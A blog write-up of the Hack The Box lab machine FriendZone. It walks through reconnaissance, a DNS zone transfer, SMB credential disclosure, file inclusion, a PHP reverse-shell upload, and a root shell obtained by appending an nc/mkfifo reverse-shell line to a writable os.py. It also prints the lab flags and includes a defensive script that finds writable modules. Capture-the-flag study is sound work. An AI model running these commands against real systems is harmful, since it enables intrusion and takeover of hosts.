FriendZone-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: exhaustive enumeration, SMB information disclosure, primary domain name leaked by the TLS certificate, obtaining further subdomains with the dig axfr command, remote file inclusion, uploading a PHP backdoor with put into a readable and writable SMB share, using the smb-enum-shares.nse script, monitoring suspicious processes with pspy64, inserting a reverse shell into the Python os.py module

Reference link: https://www.rffuste.com/2020/12/14/htb-friendzone/

Reference: official walkthrough

0x01 Obtaining user privileges

1. First, get the target machine's IP address: 10.10.10.123

2. Port-scan the target with nmap to see which ports are open

┌──(kali㉿kali-linux-2022-2)-[~/Desktop]
└─$ ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.123 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

┌──(kali㉿kali-linux-2022-2)-[~/Desktop]
└─$ nmap -sC -sV -p$ports 10.10.10.123
Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-06 23:49 CST
Nmap scan report for friendzone.red (10.10.10.123)
Host is up (1.1s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open tcpwrapped
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
80/tcp open http Apache/2.4.29 (Ubuntu)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open tcpwrapped
443/tcp open ssl/tcpwrapped
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.29 (Ubuntu)
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
445/tcp open tcpwrapped Samba smbd 4.7.6-Ubuntu
1266/tcp closed dellpwrappks
2551/tcp closed isg-uda-server
9810/tcp closed unknown
18495/tcp closed unknown
23689/tcp closed unknown
25168/tcp closed unknown
26992/tcp closed unknown
39015/tcp closed unknown
46741/tcp closed unknown
49493/tcp closed unknown
51741/tcp closed unknown
52276/tcp closed unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -39m56s, deviation: 1h09m08s, median: -1s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-12-06T15:49:59
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2023-12-06T17:50:00+02:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.43 seconds

3. Query the domain name information

┌──(kali㉿kali-linux-2022-2)-[~/Desktop]
└─$ dig axfr friendzone.red @10.10.10.123

; <<>> DiG 9.19.17-2~kali1-Kali <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 292 msec
;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP)
;; WHEN: Wed Dec 06 23:52:36 CST 2023
;; XFR size: 8 records (messages 1, bytes 289)

4. SMB share enumeration

┌──(kali㉿kali-linux-2022-2)-[~/Desktop]
└─$ enum4linux 10.10.10.123
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Dec 6 23:53:15 2023

[+] Attempting to map shares on 10.10.10.123
//10.10.10.123/print$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.123/Files Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.123/general Mapping: OK Listing: OK Writing: N/A
//10.10.10.123/Development Mapping: OK Listing: OK Writing: N/A

5. Obtain the account credentials

┌──(kali㉿kali-linux-2022-2)-[~]
└─$ smbclient -N \\\\10.10.10.123\\general
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jan 17 04:10:51 2019
.. D 0 Tue Sep 13 22:56:24 2022
creds.txt N 57 Wed Oct 10 07:52:42 2018
get
3545824 blocks of size 1024. 1651384 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \>

┌──(kali㉿kali-linux-2022-2)-[~/Desktop]
└─$ cat creds.txt
creds for the admin THING:

admin:WORKWORKHhallelujah@#

6. Add the subdomains identified earlier to the local hosts file

┌──(root㉿kali-linux-2022-2)-[/home/kali/Desktop]
└─# echo '10.10.10.123 friendzone.red administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red' >> /etc/hosts

7. Log in to the admin panel

https://administrator1.friendzone.red/login.php
admin:WORKWORKHhallelujah@#

8. Discover the local/remote file inclusion vulnerability

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

9. Use the nmap script smb-enum-shares.nse to learn the absolute paths of the file shares

┌──(kali㉿kali-linux-2022-2)-[~/Desktop]
└─$ sudo nmap 10.10.10.123 --script smb-enum-shares.nse

Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 2
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 1
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>

10. Use put to upload our web shell into the readable and writable SMB share

┌──(kali㉿kali-linux-2022-2)-[~/Desktop/test]
└─$ smbclient \\\\10.10.10.123\\Development
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (6.3 kb/s) (average 6.3 kb/s)
smb: \> dir
. D 0 Thu Dec 7 00:05:14 2023
.. D 0 Tue Sep 13 22:56:24 2022
php-reverse-shell.php A 5493 Thu Dec 7 00:08:14 2023

3545824 blocks of size 1024. 1651372 blocks available
smb: \>

12. Obtain an initial shell through the remote file inclusion and read the first flag, user.txt

┌──(kali㉿kali-linux-2022-2)-[~]
└─$ nc -lnvp 10086
listening on [any] 10086 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.123] 55900
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
18:10:22 up 37 min, 0 users, load average: 0.02, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@FriendZone:/$ ls -la /home/
ls -la /home/
total 12
drwxr-xr-x 3 root root 4096 Sep 13 2022 .
drwxr-xr-x 22 root root 4096 Sep 13 2022 ..
drwxr-xr-x 5 friend friend 4096 Sep 13 2022 friend
www-data@FriendZone:/$ cat /home/friend/user.txt
cat /home/friend/user.txt
4e4755aacc0b3a6b2661a5f51bd2a08a
www-data@FriendZone:/$

0x02 Obtaining system (root) privileges

13. Part of the process is omitted without explanation

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

python -m SimpleHTTPServer 8080

www-data@FriendZone:/etc/Development$ wget http://10.10.14.12:8080/pspy64 pspy64

chmod +x pspy64
./pspy64

cat /opt/server_admin/reports.py

/usr/lib/python2.7/os.py

14. LinEnum shows that we have write permission on os.py; insert a reverse shell into this file to obtain the final root privileges

www-data@FriendZone:/$ echo "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 10010 >/tmp/f')" >> /usr/lib/python2.7/os.py
<0.14.7 10010 >/tmp/f')" >> /usr/lib/python2.7/os.py
www-data@FriendZone:/$
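The escalation above works only because /usr/lib/python2.7/os.py is writable by www-data while a root-owned process imports it (the page watches that with pspy64). As an added defender-side check, not code from the original writeup, the script below walks Python library directories and reports every .py file or directory that group or other can write; DEFAULT_PATHS is an assumption, so pass the host's real library paths as arguments.

```python
import os
import stat

# Library directories to audit; assumed defaults, adjust for the host.
DEFAULT_PATHS = ["/usr/lib/python2.7", "/usr/lib/python3"]


def writable_by_group_or_other(mode):
    """True when the group or 'other' class has the write bit set."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_writable_modules(paths):
    """Return a sorted list of (path, octal mode) for every directory and
    .py file under `paths` that group or other can write. Symlinks are
    skipped and unreadable entries are ignored. A writable directory is
    reported too, since any module inside it can simply be replaced."""
    findings = []
    for root_dir in paths:
        if not os.path.isdir(root_dir):
            continue
        for dirpath, _dirnames, filenames in os.walk(root_dir):
            candidates = [dirpath] + [
                os.path.join(dirpath, f) for f in filenames if f.endswith(".py")
            ]
            for full in candidates:
                try:
                    st = os.lstat(full)
                except OSError:
                    continue
                if stat.S_ISLNK(st.st_mode):
                    continue
                if writable_by_group_or_other(st.st_mode):
                    findings.append((full, oct(stat.S_IMODE(st.st_mode))))
    return sorted(findings)


if __name__ == "__main__":
    import sys
    targets = sys.argv[1:] or DEFAULT_PATHS
    hits = find_writable_modules(targets)
    for path, mode in hits:
        print("%s %s" % (mode, path))
    print("%d writable entries found" % len(hits))
```

On this box the expected hit is /usr/lib/python2.7/os.py; anything such a scan reports should be owned by root with mode 0644 (files) or 0755 (directories).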

15. Obtain the final root privileges

┌──(kali㉿kali-linux-2022-2)-[~]
└─$ nc -lnvp 10010
listening on [any] 10010 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.123] 48600
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# pwd
/root
# ls
certs
root.txt
# cat root.txt
39745fd268a059fb44a08c6a54edb2bb
#

16. Don't ask why this article is so brief: I enumerated until I was sick of it and still had no idea what to do; my information-gathering skills are just too poor. That's it? And it's rated Easy??? Whether I even still take the OSCP == if every box is like this one, I guess I can give up.

0x03 Proof of completion

https://www.hackthebox.com/achievement/machine/1705469/173


https://sh1yan.top/2023/12/06/FriendZone-htb-writeup/
Author: shiyan
Published on: December 6, 2023